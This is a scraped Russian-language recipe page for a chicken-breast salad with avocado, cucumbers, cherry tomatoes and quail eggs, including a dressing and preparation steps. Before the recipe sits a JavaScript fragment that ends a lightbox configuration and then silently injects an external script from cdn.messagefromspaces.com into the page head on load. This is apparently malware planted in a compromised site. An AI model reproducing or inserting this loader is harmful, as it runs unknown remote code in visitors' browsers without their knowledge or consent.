, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Вкусно + Полезно

Салат из куриных грудок


DSCF2617Этот салат — один из вариантов использования Универсальных куриных грудок .  Отличается он простотой приготовления, полезностью и сытностью. Можно легко менять ингредиенты, можно ограничиться только этим салатом на ужин, а можно его подать как холодную закуску на праздничный стол.

Чего и сколько берем:

1. Куриные грудки «Универсальные» — 2 шт.

2. Листья любых салатов

3. Огурцы — 3 шт.

4. Авокадо — 1 шт.

5. Помидоры черри — 10-15 шт

6. Перепелиные яйца — 2/3 шт.

Заправка:

1. Оливковое масло — 1/3 стакана

2. Соевый соус (слабосоленый) — по вкусу 2/3 ст. ложки

3. Соус гранатовый «Нашараб» — 1/2 чайные ложки

4. Винный уксус — 1/2 ч. ложки

5. Черный перец крупного помола

Начинаем готовить:

1. Очистить огурцы от кожуры и порезать на дольки

2. Очистить авокадо и порезать на дольки

3. Смешать огурцы и салатные листья, добавить заправку и хорошо перемешать

4. Выложить салат с огурцами на тарелку и сверху  разложить авокадо и нарезанные пластинками грудки

5. Полить оставшейся заправкой и поперчить

6. Украсить помидорами и яйцами

 

На эту тему вы можете почитать:

Курочка в соусе Тамаринда
Салат из курицы по-французски
Курица на соли

Тэги: ,



Добавить комментарий